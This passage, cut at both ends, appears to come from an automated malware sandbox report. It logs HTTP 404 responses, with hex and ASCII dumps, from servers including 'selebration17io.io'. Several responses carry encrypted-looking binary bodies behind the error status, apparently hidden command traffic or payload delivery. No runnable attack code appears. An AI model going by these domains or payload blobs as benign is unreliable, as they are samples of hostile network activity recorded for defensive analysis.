ae cc 4f 3b 79 82 ae cc 95 03 4c 69 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cd 46 e1 4a 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 06 f0 27 38 03 9b c7 9b 4f 06 3d 66 f1 9a 64 b1 1d ee 12 51 8c 74 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 6e a1 54 35 8b fc d3 7a 1b a2 cb 29 37 08 e7 5b 1e 54 aa 1e 26 61 11 ee c3 2c 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 6c 5e ae 43 75 81 7e 90 c7 7d 10 9f 30 1d dc b0 99 37 98 8a cd 70 7a 74 79 ae 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f 30 a0 aa 7a 8f 16 6d e3 cd d2 d9 37 00 12 e5 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 34 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a4 4e f2 7b a9 64 14 00 78 a2 3e 5c 67 d8 0f 2b 09 7a 80 f5 d3 ed d7 70 97 3f 2e 5e 61 be b4 bf f7 5a 6e 94 2b 7b be d5 d4 3f a6 55 70 fb 0d 0a 30 0d 0a 0d 0a Data Ascii: 47Uys/~(`:LDN{dx>\g+zp?.^aZn+{?Up0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 10 9a 13 d8 58 d7 b8 13 b6 27 f0 3c 4c 58 23 be 65 0b 69 c3 5c 28 1f 78 9e bd 80 ba 9a 29 c5 7f 64 5d 28 e2 0d 0a 30 0d 0a 0d 0a Data Ascii: 37Uys/~(`:X'<LX#ei\(x)d](0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 1b 13 a6 40 a3 b8 24 08 4f c5 03 a1 cb a1 81 7e 51 74 62 b8 1b 0e 7e cb af 9a a5 02 c9 a0 c1 b9 dd 7a 4d 0c 4e 19 e0 3c 95 a9 18 aa f5 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6a a1 c0 4a 9c 03 fd ec 9a aa 7b ac 87 2f bd 61 0d 80 5c bf 46 30 fd f8 12 6c 33 6c 2b 7c 0a 0d c7 fd f4 0e a4 ab 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 eb 2a b9 22 e7 cc 23 b2 65 0f 31 79 be 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 94 7b 39 7e e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e 42 ee 11 ee c3 de 57 a3 4c 89 85 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 81 e6 7f 74 79 e0 6d 43 cc bd 8b 8b e1 fa 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 45 de d9 37 00 40 e3 1c c9 20 f5 52 48 58 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e cf 9f ce ec 35 48 c3 a7 0d a2 ca d4 5f b5 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 09 b6 da c3 e8 c8 2f c3 e2 09 e8 8b c3 1e ac 18 b8 77 b3 0e 35 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 8c 6b 93 94 12 f9 22 d9 ed 1f b2 52 dc 1a 6e 8b 18 57 23 01 7d 42 a5 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 35 8c 57 7a 14 0f 5b 30 5f 62 ae b8 78 fe b1 8f 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 11 20 b2 6d f5 62 27 28 74 1c 5c 5a 16 9f 19 5f 11 9f 68 f9 e4 15 2a 01 6e 59 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 41 82 e3 c2 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 a1 04 85 d4 9c 97 2e 60 ce 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ed fb 91 35 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Content-Length: 147Date: Tue, 20 Feb 2024 23:23:35 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 70 69 6e 67 2e 70 68 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:24:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:24:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:24:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:24:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:24:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:24:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:25:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:25:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:25:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:25:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:25:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-91.ec2.internalX-Request-Id: 442925dd-e137-41ff-a1ec-630f29d258cbData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471566.6691477841833126972Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkiHzpTYSDRA7u88Ic3Fde4MbwluI1yUDJty9McxOlfY,2d58ifebGbosy5xc+FRalot867MtYSc3APbnkd7f9Dpb3SW7+008Ar5bJO2TG+4Wpt6ND/sSN7Q26K/LDtWcVA==,2UNV7KOq4oGjA5+PKsX47HNYW5FMKOqazjq32++LUUhYgeUJqUXtid+86vZww+nL,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,mKaRWos/zMP5pe1EkxMqWs8DqAwKLEYCI354Y33x8XA=,/j+AjfLiOiE0Vc9NsP8sK5u8Qsk402xLUnMD3SjpKh94x31OHVUG/2k0Z4Dsbv6NA62VGTLLBfcAQHnKF5lgxw==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 91 93 c6 4e 